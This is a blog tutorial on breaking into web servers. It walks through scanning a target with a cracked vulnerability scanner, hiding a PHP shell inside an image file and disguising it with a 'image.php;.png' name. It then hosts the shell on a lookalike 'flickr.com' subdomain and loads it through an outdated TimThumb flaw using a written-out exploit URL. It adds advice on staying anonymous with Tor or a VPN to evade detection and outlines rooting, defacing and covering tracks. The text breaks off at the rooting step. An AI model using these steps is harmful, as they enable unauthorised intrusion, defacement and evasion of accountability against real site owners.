How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

Web-Hacking is a huge topic that I could easily discuss for hours.

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….

So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server

Everything you need to know….

 

Tools you need:

– Backtrack (Backtrack Website)

– Firefox (get it from here….) – Included in Backtrack and Ubuntu

– Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….

– iCon2PHP (Get it from here….)

– A good shell (iCon2PHP Archive includes three great shells)

– A good VPN or Tor (More explanation below…..)

– Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack

– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.

(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)

Firefox

– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….

Netcat

– Netcat is a powerful networking tool. You will need this to root the server….

iCon2PHP & Good Shells

– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.

Good VPN or TOR (Proxies are good too…)

– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.

What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account

Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.

— If I listed the above options according to their reliability :                                 

1. Paid VPN Account at ProXPN

2. Tor

3. Free VPN Account at ProXPN

4. Proxy Connection

Acunetix Web Vulnerability Scanner

– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.

The Consultant Edition (For unlimited websites) costs about 3000-7000$.

____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:

Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

– – –  Before we begin  – – –

-Boot to Backtrack

-Connect to your VPN or to Tor.

-It would be good to read a complete guide to stay anonymous while hacking here…

-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be:http://www.site.com (not very innovative, I know….)

Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.

The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)

OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php

The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.

OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).

For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.

-It is hosted on a Unix System.

Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.

Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.

Run the Program and follow the in-program instructions to build the ‘finalImage.php’.

To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.

iCon2PHP Terminal Output:

[…]

Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php

Entered!

Valid Files!
[…]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)

Go to the vulnerability and type at the URL:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png

It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

N

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s